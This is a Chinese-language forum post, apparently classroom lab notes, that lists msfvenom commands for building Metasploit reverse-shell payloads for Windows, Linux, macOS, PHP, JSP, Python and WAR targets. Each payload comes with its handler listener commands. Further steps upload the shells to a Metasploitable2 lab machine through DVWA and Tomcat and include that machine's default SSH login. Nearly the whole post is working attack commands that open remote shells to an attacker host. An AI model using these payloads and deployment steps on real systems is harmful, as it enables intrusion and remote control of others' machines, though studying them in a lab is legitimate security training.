metasploit 各种payload生成利用
metasploit 课堂实验一,windows 被控端实验
生成:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.26 LPORT=4444 -f exe > shell.exemsf 监听:
#监听
use exploit/multi/handler
set payloadwindows/meterpreter/reverse_tcp
set lhost 192.168.1.26
set lport 4444
exploit
二,linux下被控端实验
生成:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.26 LPORT=4444 -f elf > shell.elfmsf 监听:
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.1.26
set lport 4444
exploit
三:mac 被控端实验
生成:<blockquote>msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.11 LPORT=4444 -f macho > shell.macho
msf 监听:
use exploit/multi/handler
set osx/x86/shell_reverse_tcp
set lhost 192.168.1.26
set lport 4444
exploit
四:php 被控端 实验
生成:
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.21 LPORT=4444 -f raw > shell.phpmsf 监听:
use exploit/multi/handler
set php/meterpreter_reverse_tcp
set lhost 192.168.1.26
set lport 4444
exploit在目标主机浏览shell.php,会显示旋转
等待一会,kali会上线
经过测试,有BUG,会超时。
暂且修改php运行时间和内存限制,在配置文件php.ini中修改
max_execution_time = 3000 #最大执行时间
memory_limit = 2048M# n内存限制为多大经测试,还是无效,但是在控制端一直有操作则不会超时,停止操作一会就会超时。
五:JSP 被控端实验
这里使用 metasploitable2靶机作为目标实验对象
生成:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.26 LPORT=4444 -f raw > shell.jsp
把shell.jsp通过metasploitable2靶机中的dvwa的文件上传功能上传到靶机里。
dvwa: http://192.168.1.25/dvwa
登录metasploitable2靶机
ssh msfadmin@192.168.1.25 #密码是msfadmin执行命令
mv /var/www/dvwa/hackable/uploads/shell.jsp /usr/share/tomcat5.5/server/webapps/manager/shell.jspmsf 监听:
use exploit/multi/handler
set java/jsp_shell_reverse_tcp
set lhost 192.168.1.26
set lport 4444
exploit
# 然后打开浏览器 浏览 http://192.168.1.25:8180/manager/shell.jsp
上线:
六:Python 被控端实验
生成:msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.26 LPORT=4444 -f raw > shell.py
把shell.py通过metasploitable2靶机中的dvwa的文件上传功能上传到靶机里。
dvwa: http://192.168.1.25/dvwa
登录metasploitable2靶机
ssh msfadmin@192.168.1.25 #密码是msfadmin给shell.py 执行权限 chmod +x 目标文件
sudo chmod +x/var/www/dvwa/hackable/uploads/shell.pymsf 监听:
use exploit/multi/handler
set payload cmd/unix/reverse_python
set lhost 192.168.1.26
set lport 4444
exploit
#目标机执行文件shell.py
sudo /var/www/dvwa/hackable/uploads/shell.py
七:war包被控端
生成被控端,使用metasploitable2 作为靶机实验
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.26 LPORT=4444 -f war > shell.war
浏览靶机 http://192.168.1.25:8180/
登录后在页面下方部署war包
点击 Deploy
查看shell.war 包内容,使用winrar就可以查看
浏览器访问:http://192.168.1.25:8180/shell/usaafdfxze.jsp
有主机上线请注意
页:
[1]